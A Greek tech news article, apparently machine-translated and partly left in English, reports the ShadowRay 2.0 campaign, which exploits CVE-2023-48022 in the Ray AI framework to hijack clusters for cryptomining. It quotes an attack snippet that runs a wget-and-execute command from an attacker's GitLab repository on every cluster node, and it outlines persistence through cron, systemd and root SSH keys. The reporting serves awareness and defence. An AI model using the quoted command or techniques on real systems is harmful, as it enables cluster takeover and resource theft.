Παρασκευή, 9 Ιανουαρίου, 2026
ΑρχικήSecurityΝέα ευπάθεια ShadowRay Attack Exploit Ray AI-Framework για επίθεση σε συστήματα AI

Νέα ευπάθεια ShadowRay Attack Exploit Ray AI-Framework για επίθεση σε συστήματα AI


Οι ερευνητές στον τομέα της κυβερνοασφάλειας ανακάλυψαν μια ενεργή παγκόσμια εκστρατεία hacking που αξιοποιεί ένα γνωστό ελάττωμα στο Ray, ένα πλαίσιο AI ανοιχτού κώδικα που χρησιμοποιείται ευρέως για τη διαχείριση κατανεμημένων εργασιών υπολογιστών.

Με το όνομα ShadowRay 2.0, αυτή η επίθεση εκμεταλλεύεται την ευπάθεια CVE-2023-48022 για να καταλάβει σιωπηλά τον έλεγχο ισχυρών συμπλεγμάτων υπολογιστών AI και να τα μετατρέψει σε λειτουργίες εξόρυξης κρυπτονομισμάτων.

Η καμπάνια αντιπροσωπεύει μια σημαντική κλιμάκωση από την αρχική ανακάλυψη του ShadowRay τον Μάρτιο του 2024, με τους επιτιθέμενους να χρησιμοποιούν εξελιγμένες τακτικές για να παραμείνουν κρυφοί ενώ εξάγουν μέγιστη αξία από παραβιασμένη υποδομή.

Οι ερευνητές της Oligo Security αναγνώρισαν την εκστρατεία επίθεσης στις αρχές Νοεμβρίου 2025, ανακαλύπτοντας ότι οι παράγοντες απειλών που χρησιμοποιούν το όνομα IronErn440 έχουν οπλίσει τα νόμιμα χαρακτηριστικά ενορχήστρωσης του Ray σε εργαλεία για αυτοδιαδιδόμενες επιθέσεις.

Αυτό που κάνει αυτή την απειλή ιδιαίτερα ανησυχητική είναι η τεράστια κλίμακα της έκθεσης. Ο αριθμός των εκτεθειμένων διακομιστών Ray παγκοσμίως έχει αυξηθεί από χιλιάδες κατά την αρχική ανακάλυψη σε περισσότερες από 230.000 περιπτώσεις σήμερα.

Πολλά ανήκουν σε ενεργές startups, ερευνητικά εργαστήρια και παρόχους φιλοξενίας cloud, δημιουργώντας μια εκτεταμένη επιφάνεια επίθεσης.

Αναλυτές ασφαλείας Oligo Security αναγνωρισθείς την επίθεση μετά από παρατήρηση κακόβουλου λογισμικού που γνωρίζει την περιοχή που διανέμεται μέσω του GitLab.

Οι εισβολείς χρησιμοποίησαν αρχικά την πλατφόρμα DevOps για να παραδώσουν προσαρμοσμένα ωφέλιμα φορτία προσαρμοσμένα στη γεωγραφική τοποθεσία κάθε θύματος.

Μετά την κατάργηση του κακόβουλου αποθετηρίου στις 5 Νοεμβρίου 2025 από το GitLab, οι παράγοντες απειλών μετέφεραν γρήγορα τη λειτουργία τους στο GitHub, επιδεικνύοντας αξιοσημείωτη λειτουργική ευελιξία.

Μέχρι τις 10 Νοεμβρίου, είχαν δημιουργήσει ένα νέο αποθετήριο και συνέχισαν την καμπάνια τους με ακόμη μεγαλύτερη κομψότητα.

AI επιτίθεται στην υποδομή AI

Η επίθεση εκτυλίσσεται σε πολλαπλά συντονισμένα στάδια, ξεκινώντας με την αναγνώριση χρησιμοποιώντας το interact.sh, μια πλατφόρμα εκτός ζώνης που επιτρέπει στους εισβολείς να εντοπίζουν ευάλωτους διακομιστές χωρίς παραδοσιακή θορυβώδη σάρωση.

Οι επιτιθέμενοι στέλνουν ανιχνευτές στοχεύοντας το μη προστατευμένο Jobs API του Ray, πυροδοτώντας επανακλήσεις από ευάλωτες περιπτώσεις. Μόλις εντοπιστούν οι στόχοι, εκμεταλλεύονται τον μη πιστοποιημένο πίνακα ελέγχου Ray για να υποβάλουν κακόβουλες εργασίες που εκτελούν αυθαίρετο κώδικα με δικαιώματα συμπλέγματος.

Ray Cluster (Πηγή - Oligo)
Ray Cluster (Πηγή – Oligo)

Η πιο αξιοσημείωτη πτυχή είναι η χρήση ωφέλιμων φορτίων που δημιουργούνται από AI. Οι εισβολείς αναπτύσσουν κώδικα Python που ανακαλύπτει αυτόματα διαθέσιμους πόρους συμπλέγματος, υπολογίζει το 60 τοις εκατό κατανομή CPU και GPU για να αποφύγει τον άμεσο εντοπισμό και στη συνέχεια εισάγει εξορύκτες κρυπτονομισμάτων μεταμφιεσμένους ως νόμιμες διαδικασίες συστήματος.

Τα ωφέλιμα φορτία επιδεικνύουν περίπλοκο χειρισμό σφαλμάτων και αυτοπροσαρμογή, υποδηλώνοντας ότι δημιουργήθηκαν ή βελτιώθηκαν χρησιμοποιώντας εργαλεία τεχνητής νοημοσύνης για την επιτάχυνση της ανάπτυξης ωφέλιμου φορτίου.

Ένα κρίσιμο απόσπασμα κώδικα δείχνει τον μηχανισμό μόλυνσης πολλαπλών σταδίων. Το αρχικό ωφέλιμο φορτίο πρόσβασης χρησιμοποιεί το NodeAffinitySchedulingStrategy του Ray για να απαριθμήσει τους κόμβους συμπλέγματος και να αναπτύξει σενάρια μόλυνσης σε κάθε έναν:

κόμβοι=[n for n in ray.nodes() if n.get('Alive', False)]
cmd='wget -qO- https://gitlab.com/ironern440-group/ironern440-project/-/raw/main/aa_clean.sh && chmod +x aa_clean.sh && ./aa_clean.sh'
[ray.get(ray.remote(lambda:subprocess.run(cmd,shell=True)).options(scheduling_strategy=NodeAffinitySchedulingStrategy...

The attackers establish persistence through multiple mechanisms: cron jobs executing every fifteen minutes, systemd service hijacking, and SSH key injection into root accounts.

They mask malicious processes by renaming them to appear as legitimate kernel workers like [kworker/0:0] και υπηρεσίες φίλτρου dns, που ουσιαστικά κρύβονται σε κοινή θέα.

Mining Pool Statistics (Πηγή – Oligo)

Αυτό που ξεχωρίζει αυτή την καμπάνια είναι η δυναμική του ενεργού ανταγωνισμού. Οι εισβολείς αναπτύσσουν σενάρια για να ανιχνεύσουν και να τερματίσουν τους ανταγωνιστές εξόρυξης κρυπτονομισμάτων και, στη συνέχεια, να αποκλείσουν ανταγωνιστικές ομάδες εξόρυξης μέσω κανόνων iptables και τροποποιήσεων του αρχείου κεντρικού υπολογιστή.

Στοχεύουν ακόμη και πισίνες σε συγκεκριμένα λιμάνια που χρησιμοποιούνται από ανταγωνιστικούς παράγοντες απειλών, αποκαλύπτοντας ένα υπόγειο οικοσύστημα όπου πολλές εγκληματικές ομάδες μάχονται για τους ίδιους διακυβευμένους πόρους.

Η προσαρμογή των υποδομών είναι εξίσου ανησυχητική. Για τα θύματα στην Κίνα, οι εισβολείς παραδίδουν ωφέλιμα φορτία για συγκεκριμένη περιοχή μέσω υπηρεσιών διακομιστή μεσολάβησης για να παρακάμψουν τους περιορισμούς δικτύου.

Χρησιμοποιούν γεωγραφική ανίχνευση μέσω του ip-api.com, εκτελώντας διαφορετικά σενάρια για κινεζικούς και διεθνείς στόχους.

Οι εισβολείς ενημερώνουν συνεχώς τα ωφέλιμα φορτία τους μέσω των δεσμεύσεων του GitLab, αντιμετωπίζοντας την υποδομή ως κώδικα και επιτρέποντας την εξέλιξη των τεχνικών τους σε πραγματικό χρόνο χωρίς να αναδιατάσσονται σε μηχανήματα-θύμα.



VIA: cybersecuritynews.com

Marizas Dimitris
Marizas Dimitrishttps://techreport.gr
Ο Δημήτρης είναι παθιασμένος με την τεχνολογία και τις καινοτομίες. Λατρεύει να εξερευνά νέες ιδέες, να επιλύει σύνθετα προβλήματα και να βρίσκει τρόπους ώστε η τεχνολογία να γίνεται πιο ανθρώπινη, απολαυστική και προσιτή για όλους. Στον ελεύθερο χρόνο του ασχολείται με το σκάκι και το poker, απολαμβάνοντας την στρατηγική και τη δημιουργική σκέψη που απαιτούν.
RELATED ARTICLES

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

εισάγετε το σχόλιό σας!
παρακαλώ εισάγετε το όνομά σας εδώ

- Advertisment -

Most Popular

Recent Comments